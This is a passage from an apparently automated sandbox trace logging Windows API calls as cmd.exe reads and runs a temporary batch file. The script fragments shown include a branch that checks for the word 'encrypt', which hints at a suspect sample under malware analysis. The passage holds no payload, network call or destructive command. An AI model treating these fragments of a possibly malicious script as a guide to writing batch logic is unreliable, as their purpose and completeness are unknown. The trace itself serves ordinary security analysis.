(_String1="shift", _String2="SHIFT") returned 0 [0034.777] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0034.778] _wcsicmp (_String1="shift", _String2="DIR") returned 15 [0034.778] _wcsicmp (_String1="shift", _String2="ERASE") returned 14 [0034.778] _wcsicmp (_String1="shift", _String2="DEL") returned 15 [0034.778] _wcsicmp (_String1="shift", _String2="TYPE") returned -1 [0034.778] _wcsicmp (_String1="shift", _String2="COPY") returned 16 [0034.778] _wcsicmp (_String1="shift", _String2="CD") returned 16 [0034.778] _wcsicmp (_String1="shift", _String2="CHDIR") returned 16 [0034.778] _wcsicmp (_String1="shift", _String2="RENAME") returned 1 [0034.778] _wcsicmp (_String1="shift", _String2="REN") returned 1 [0034.778] _wcsicmp (_String1="shift", _String2="ECHO") returned 14 [0034.778] _wcsicmp (_String1="shift", _String2="SET") returned 3 [0034.778] _wcsicmp (_String1="shift", _String2="PAUSE") returned 3 [0034.778] _wcsicmp (_String1="shift", _String2="DATE") returned 15 [0034.778] _wcsicmp (_String1="shift", _String2="TIME") returned -1 [0034.778] _wcsicmp (_String1="shift", _String2="PROMPT") returned 3 [0034.778] _wcsicmp (_String1="shift", _String2="MD") returned 6 [0034.778] _wcsicmp (_String1="shift", _String2="MKDIR") returned 6 [0034.778] _wcsicmp (_String1="shift", _String2="RD") returned 1 [0034.778] _wcsicmp (_String1="shift", _String2="RMDIR") returned 1 [0034.778] _wcsicmp (_String1="shift", _String2="PATH") returned 3 [0034.778] _wcsicmp (_String1="shift", _String2="GOTO") returned 12 [0034.778] _wcsicmp (_String1="shift", _String2="SHIFT") returned 0 [0034.778] _get_osfhandle (_FileHandle=1) returned 0x28 [0034.778] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0034.779] _get_osfhandle (_FileHandle=1) returned 0x28 [0034.779] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0034.779] _get_osfhandle (_FileHandle=0) returned 0x24 [0034.779] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0034.779] SetConsoleInputExeNameW () returned 0x1 [0034.779] GetConsoleOutputCP () returned 0x1b5 [0034.780] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0034.780] SetThreadUILanguage (LangId=0x0) returned 0x409 [0034.780] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0034.780] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0034.780] _get_osfhandle (_FileHandle=3) returned 0x84 [0034.780] SetFilePointer (in: hFile=0x84, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0034.781] _get_osfhandle (_FileHandle=3) returned 0x84 [0034.781] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0034.781] ReadFile (in: hFile=0x84, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xa66, lpOverlapped=0x0) returned 1 [0034.781] SetFilePointer (in: hFile=0x84, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0034.781] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="@echo off\r\n") returned 11 [0034.781] _get_osfhandle (_FileHandle=3) returned 0x84 [0034.781] GetFileType (hFile=0x84) returned 0x1 [0034.781] _get_osfhandle (_FileHandle=3) returned 0x84 [0034.781] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0034.781] _wcsicmp (_String1="echo", _String2=")") returned 60 [0034.781] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0034.781] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0034.781] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0034.782] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0034.782] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0034.782] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0034.783] _tell (_FileHandle=3) returned 19 [0034.783] _close (_FileHandle=3) returned 0 [0034.783] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0034.783] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0034.783] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0034.783] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0034.783] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0034.783] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0034.783] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0034.783] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0034.783] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0034.783] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0034.783] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0034.783] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0034.783] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0034.783] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0034.784] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0034.784] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0034.784] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0034.784] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0034.784] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0034.784] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0034.784] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0034.784] _wcsnicmp (_String1="off", _String2="off", _MaxCount=0x3) returned 0 [0034.784] _get_osfhandle (_FileHandle=1) returned 0x28 [0034.784] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0034.785] _get_osfhandle (_FileHandle=1) returned 0x28 [0034.785] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0034.785] _get_osfhandle (_FileHandle=0) returned 0x24 [0034.785] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0034.785] SetConsoleInputExeNameW () returned 0x1 [0034.785] GetConsoleOutputCP () returned 0x1b5 [0034.785] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0034.786] SetThreadUILanguage (LangId=0x0) returned 0x409 [0034.786] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0034.786] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0034.786] _get_osfhandle (_FileHandle=3) returned 0x84 [0034.786] SetFilePointer (in: hFile=0x84, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0034.786] _get_osfhandle (_FileHandle=3) returned 0x84 [0034.786] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0034.786] ReadFile (in: hFile=0x84, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xa5b, lpOverlapped=0x0) returned 1 [0034.786] SetFilePointer (in: hFile=0x84, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0034.787] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0034.787] _get_osfhandle (_FileHandle=3) returned 0x84 [0034.787] GetFileType (hFile=0x84) returned 0x1 [0034.787] _get_osfhandle (_FileHandle=3) returned 0x84 [0034.787] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0034.787] _tell (_FileHandle=3) returned 21 [0034.787] _close (_FileHandle=3) returned 0 [0034.787] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0034.787] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0034.787] _get_osfhandle (_FileHandle=3) returned 0x84 [0034.787] SetFilePointer (in: hFile=0x84, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0034.787] _get_osfhandle (_FileHandle=3) returned 0x84 [0034.787] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0034.787] ReadFile (in: hFile=0x84, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xa59, lpOverlapped=0x0) returned 1 [0034.787] SetFilePointer (in: hFile=0x84, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0034.787] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0034.788] _get_osfhandle (_FileHandle=3) returned 0x84 [0034.788] GetFileType (hFile=0x84) returned 0x1 [0034.788] _get_osfhandle (_FileHandle=3) returned 0x84 [0034.788] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0034.788] _tell (_FileHandle=3) returned 25 [0034.788] _close (_FileHandle=3) returned 0 [0034.788] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0034.788] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0034.788] _get_osfhandle (_FileHandle=3) returned 0x84 [0034.788] SetFilePointer (in: hFile=0x84, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0034.788] _get_osfhandle (_FileHandle=3) returned 0x84 [0034.788] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0034.789] ReadFile (in: hFile=0x84, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xa55, lpOverlapped=0x0) returned 1 [0034.789] SetFilePointer (in: hFile=0x84, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0034.789] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 73 [0034.789] _get_osfhandle (_FileHandle=3) returned 0x84 [0034.789] GetFileType (hFile=0x84) returned 0x1 [0034.789] _get_osfhandle (_FileHandle=3) returned 0x84 [0034.789] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0034.789] _wcsicmp (_String1="for", _String2=")") returned 61 [0034.789] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0034.789] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0034.790] _wcsicmp (_String1="/L", _String2="/f") returned 6 [0034.790] _wcsicmp (_String1="/D", _String2="/f") returned -2 [0034.790] _wcsicmp (_String1="/F", _String2="/f") returned 0 [0034.790] _wcsicmp (_String1="/L", _String2="%i") returned 10 [0034.790] _wcsicmp (_String1="/D", _String2="%i") returned 10 [0034.790] _wcsicmp (_String1="/F", _String2="%i") returned 10 [0034.790] _wcsicmp (_String1="/R", _String2="%i") returned 10 [0034.791] _wcsicmp (_String1="IN", _String2="in") returned 0 [0034.792] _wcsicmp (_String1="DO", _String2="do") returned 0 [0034.792] _wcsicmp (_String1="set", _String2=")") returned 74 [0034.792] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0034.792] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0034.792] _wcsicmp (_String1="IF", _String2="set") returned -10 [0034.792] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0034.792] _wcsicmp (_String1="REM", _String2="set") returned -1 [0034.792] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0034.793] _tell (_FileHandle=3) returned 98 [0034.793] _close (_FileHandle=3) returned 0 [0034.794] _wcsnicmp (_String1="delims=\"", _String2="usebackq", _MaxCount=0x8) returned -17 [0034.794] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0034.794] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0034.794] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0034.794] _wpopen (_Command="find \"e\" \"C:\\FRS_TEMP\\temp.txt\"", _Mode="rb") returned 0x76ea4c68 [0034.801] feof (_File=0x76ea4c68) returned 0 [0034.801] ferror (_File=0x76ea4c68) returned 0 [0034.801] fgets (in: _Buf=0xd274e8, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0035.118] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 1 [0035.118] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd274e8, cbMultiByte=0, lpWideCharStr=0xd274e8, cchWideChar=0 | out: lpWideCharStr="") returned 0 [0035.118] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.118] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0035.119] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.119] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0035.119] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.119] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.119] SetConsoleInputExeNameW () returned 0x1 [0035.119] GetConsoleOutputCP () returned 0x1b5 [0035.119] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.119] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.119] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0035.120] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0035.120] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.120] SetFilePointer (in: hFile=0x94, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0035.120] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.120] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0035.120] ReadFile (in: hFile=0x94, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xa0c, lpOverlapped=0x0) returned 1 [0035.120] SetFilePointer (in: hFile=0x94, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0035.120] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0035.120] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.120] GetFileType (hFile=0x94) returned 0x1 [0035.120] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.120] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0035.121] GetEnvironmentVariableW (in: lpName="e", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0035.121] _wcsicmp (_String1="e", _String2="CD") returned 2 [0035.121] _wcsicmp (_String1="e", _String2="ERRORLEVEL") returned -114 [0035.121] _wcsicmp (_String1="e", _String2="CMDEXTVERSION") returned 2 [0035.121] _wcsicmp (_String1="e", _String2="CMDCMDLINE") returned 2 [0035.121] _wcsicmp (_String1="e", _String2="DATE") returned 1 [0035.121] _wcsicmp (_String1="e", _String2="TIME") returned -15 [0035.121] _wcsicmp (_String1="e", _String2="RANDOM") returned -13 [0035.121] _wcsicmp (_String1="e", _String2="HIGHESTNUMANODENUMBER") returned -3 [0035.121] _wcsicmp (_String1="If", _String2=")") returned 64 [0035.121] _wcsicmp (_String1="FOR", _String2="If") returned -3 [0035.121] _wcsicmp (_String1="FOR/?", _String2="If") returned -3 [0035.121] _wcsicmp (_String1="IF", _String2="If") returned 0 [0035.121] _wcsicmp (_String1="IF/?", _String2="If") returned 47 [0035.121] _wcsicmp (_String1="\\\"\\\"", _String2="/I") returned 45 [0035.122] _wcsicmp (_String1="ERRORLEVEL", _String2="\\\"\\\"") returned 9 [0035.122] _wcsicmp (_String1="EXIST", _String2="\\\"\\\"") returned 9 [0035.122] _wcsicmp (_String1="CMDEXTVERSION", _String2="\\\"\\\"") returned 7 [0035.122] _wcsicmp (_String1="DEFINED", _String2="\\\"\\\"") returned 8 [0035.122] _wcsicmp (_String1="NOT", _String2="\\\"\\\"") returned 18 [0035.122] _wcsicmp (_String1="goto", _String2=")") returned 62 [0035.122] _wcsicmp (_String1="FOR", _String2="goto") returned -1 [0035.122] _wcsicmp (_String1="FOR/?", _String2="goto") returned -1 [0035.122] _wcsicmp (_String1="IF", _String2="goto") returned 2 [0035.122] _wcsicmp (_String1="IF/?", _String2="goto") returned 2 [0035.122] _wcsicmp (_String1="REM", _String2="goto") returned 11 [0035.122] _wcsicmp (_String1="REM/?", _String2="goto") returned 11 [0035.123] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0035.123] _tell (_FileHandle=3) returned 130 [0035.123] _close (_FileHandle=3) returned 0 [0035.123] lstrcmpW (lpString1="\\\"\\\"", lpString2="\\\"encrypt\\\"") returned -1 [0035.123] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.123] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0035.124] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.124] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0035.124] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.124] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.124] SetConsoleInputExeNameW () returned 0x1 [0035.124] GetConsoleOutputCP () returned 0x1b5 [0035.124] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.124] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.125] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0035.125] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0035.125] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.125] SetFilePointer (in: hFile=0x94, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0035.125] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.125] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0035.125] ReadFile (in: hFile=0x94, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9ec, lpOverlapped=0x0) returned 1 [0035.125] SetFilePointer (in: hFile=0x94, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0035.125] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 5 [0035.125] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.125] GetFileType (hFile=0x94) returned 0x1 [0035.125] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.125] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0035.126] _wcsicmp (_String1="cls", _String2=")") returned 58 [0035.126] _wcsicmp (_String1="FOR", _String2="cls") returned 3 [0035.126] _wcsicmp (_String1="FOR/?", _String2="cls") returned 3 [0035.126] _wcsicmp (_String1="IF", _String2="cls") returned 6 [0035.126] _wcsicmp (_String1="IF/?", _String2="cls") returned 6 [0035.126] _wcsicmp (_String1="REM", _String2="cls") returned 15 [0035.126] _wcsicmp (_String1="REM/?", _String2="cls") returned 15 [0035.126] _tell (_FileHandle=3) returned 135 [0035.126] _close (_FileHandle=3) returned 0 [0035.126] _wcsicmp (_String1="cls", _String2="DIR") returned -1 [0035.126] _wcsicmp (_String1="cls", _String2="ERASE") returned -2 [0035.126] _wcsicmp (_String1="cls", _String2="DEL") returned -1 [0035.126] _wcsicmp (_String1="cls", _String2="TYPE") returned -17 [0035.126] _wcsicmp (_String1="cls", _String2="COPY") returned -3 [0035.126] _wcsicmp (_String1="cls", _String2="CD") returned 8 [0035.126] _wcsicmp (_String1="cls", _String2="CHDIR") returned 4 [0035.126] _wcsicmp (_String1="cls", _String2="RENAME") returned -15 [0035.126] _wcsicmp (_String1="cls", _String2="REN") returned -15 [0035.126] _wcsicmp (_String1="cls", _String2="ECHO") returned -2 [0035.126] _wcsicmp (_String1="cls", _String2="SET") returned -16 [0035.126] _wcsicmp (_String1="cls", _String2="PAUSE") returned -13 [0035.126] _wcsicmp (_String1="cls", _String2="DATE") returned -1 [0035.126] _wcsicmp (_String1="cls", _String2="TIME") returned -17 [0035.126] _wcsicmp (_String1="cls", _String2="PROMPT") returned -13 [0035.126] _wcsicmp (_String1="cls", _String2="MD") returned -10 [0035.127] _wcsicmp (_String1="cls", _String2="MKDIR") returned -10 [0035.127] _wcsicmp (_String1="cls", _String2="RD") returned -15 [0035.127] _wcsicmp (_String1="cls", _String2="RMDIR") returned -15 [0035.127] _wcsicmp (_String1="cls", _String2="PATH") returned -13 [0035.127] _wcsicmp (_String1="cls", _String2="GOTO") returned -4 [0035.127] _wcsicmp (_String1="cls", _String2="SHIFT") returned -16 [0035.127] _wcsicmp (_String1="cls", _String2="CLS") returned 0 [0035.127] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.127] _wcsicmp (_String1="cls", _String2="DIR") returned -1 [0035.127] _wcsicmp (_String1="cls", _String2="ERASE") returned -2 [0035.127] _wcsicmp (_String1="cls", _String2="DEL") returned -1 [0035.127] _wcsicmp (_String1="cls", _String2="TYPE") returned -17 [0035.127] _wcsicmp (_String1="cls", _String2="COPY") returned -3 [0035.127] _wcsicmp (_String1="cls", _String2="CD") returned 8 [0035.127] _wcsicmp (_String1="cls", _String2="CHDIR") returned 4 [0035.127] _wcsicmp (_String1="cls", _String2="RENAME") returned -15 [0035.127] _wcsicmp (_String1="cls", _String2="REN") returned -15 [0035.127] _wcsicmp (_String1="cls", _String2="ECHO") returned -2 [0035.127] _wcsicmp (_String1="cls", _String2="SET") returned -16 [0035.127] _wcsicmp (_String1="cls", _String2="PAUSE") returned -13 [0035.127] _wcsicmp (_String1="cls", _String2="DATE") returned -1 [0035.127] _wcsicmp (_String1="cls", _String2="TIME") returned -17 [0035.127] _wcsicmp (_String1="cls", _String2="PROMPT") returned -13 [0035.127] _wcsicmp (_String1="cls", _String2="MD") returned -10 [0035.127] _wcsicmp (_String1="cls", _String2="MKDIR") returned -10 [0035.127] _wcsicmp (_String1="cls", _String2="RD") returned -15 [0035.127] _wcsicmp (_String1="cls", _String2="RMDIR") returned -15 [0035.127] _wcsicmp (_String1="cls", _String2="PATH") returned -13 [0035.127] _wcsicmp (_String1="cls", _String2="GOTO") returned -4 [0035.127] _wcsicmp (_String1="cls", _String2="SHIFT") returned -16 [0035.127] _wcsicmp (_String1="cls", _String2="CLS") returned 0 [0035.128] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.128] GetFileType (hFile=0x28) returned 0x2 [0035.128] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0035.128] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xc8ed44 | out: lpMode=0xc8ed44) returned 1 [0035.128] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0035.128] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x28, lpConsoleScreenBufferInfo=0xc8ed60 | out: lpConsoleScreenBufferInfo=0xc8ed60) returned 1 [0035.128] ScrollConsoleScreenBufferW (hConsoleOutput=0x28, lpScrollRectangle=0xc8ed50, lpClipRectangle=0x0, dwDestinationOrigin=0xfed40000, lpFill=0xc8ed58) returned 1 [0035.155] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0035.155] SetConsoleCursorPosition (hConsoleOutput=0x28, dwCursorPosition=0x0) returned 1 [0035.156] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.156] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 